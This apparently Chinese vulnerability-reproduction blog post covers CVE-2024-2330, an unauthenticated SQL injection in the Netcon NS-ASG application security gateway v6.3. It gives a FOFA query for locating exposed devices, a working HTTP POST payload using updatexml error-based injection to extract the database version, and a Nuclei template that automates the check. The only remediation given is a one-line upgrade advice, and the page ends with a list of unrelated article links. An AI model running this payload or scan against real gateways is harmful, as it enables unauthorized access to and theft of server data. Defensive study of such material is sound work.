当前位置：首页 > news >正文

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

news 2026/2/10 23:58:36

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品，集成了SSL和IPSec，旨在保障业务访问的安全性，适配所有移动终端，提供多种链路均衡和选择技术，支持多种认证方式灵活组合，以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

影响范围

NS-ASG 应用安全网关 v6.3

Ⅱ、fofa语句

app="网康科技-NS-ASG安全网关"

Ⅲ、漏洞复现

POC

POST /protocol/index.php HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}

1、发送数据包，查询当前数据库版本

Ⅳ、Nuclei-POC

id: WangKang-NS-ASG-uploadmacbind-SQLinfo:name: 由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。author: WLFseverity: highmetadata: fofa-query: app="网康科技-NS-ASG安全网关"
variables:filename: "{{to_lower(rand_base(5))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /protocol/index.php HTTP/1.1Host:{{Hostname}}Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}matchers:- type: dsldsl:- status_code==200 && contains_all(body,"nXPATH syntax error")

Ⅴ、修复建议

升级至安全版本

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

Ⅰ、漏洞描述

Ⅱ、fofa语句

Ⅲ、漏洞复现

1、发送数据包，查询当前数据库版本

Ⅳ、Nuclei-POC

Ⅴ、修复建议

相关文章：

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

2024年华为OD机试真题-查找众数及中位数-Java-OD统一考试（C卷）

力扣思路题：重复的子字符串

同城即配年度观察：顺丰同城率先全年盈利，行业破局迎参考

线上机器 swap 过高导致告警

案例分析篇13：系统分析与设计考点（2024年软考高级系统架构设计师冲刺知识点总结系列文章）

算法（结合算法图解）

Linux-多线程

深入解析C++树形关联式容器：map、set及其衍生容器的使用与原理

c++基础知识（一）

Midjourney绘图欣赏系列【人物篇】（一）

2024 年 2 月 NFT 行业动态：加密货币飙升，NFT 市场调整

【C++那些事儿】深入理解C++类与对象：从概念到实践（下）| 再谈构造函数（初始化列表）| explicit关键字 | static成员 | 友元

前端面试 ===＞【Vue2】

面试 Java 并发编程八股文十问十答第四期

物体检测-系列教程27：YOLOV5 源码解析17（训练脚本解读：训练函数4）

基于51单片机的数字时钟（万年历）设计与实现

2024年谷歌SEO的趋势预测及应对建议（川圣SEO）蜘蛛池

Rust 生命周期符号使用的方法和规律

生成哈夫曼树（100%用例）C卷(JavaPythonC++Node.jsC语言)

利用最小二乘法找圆心和半径

uniapp 对接腾讯云IM群组成员管理（增删改查）

龙虎榜——20250610

云原生核心技术 (7/12): K8s 核心概念白话解读(上)：Pod 和 Deployment 究竟是什么？

stm32G473的flash模式是单bank还是双bank？

2025 后端自学UNIAPP【项目实战：旅游项目】6、我的收藏页面

QT： `long long` 类型转换为 `QString` 2025.6.5

FFmpeg：Windows系统小白安装及其使用

群晖NAS如何在虚拟机创建飞牛NAS

HTML前端开发：JavaScript 获取元素方法详解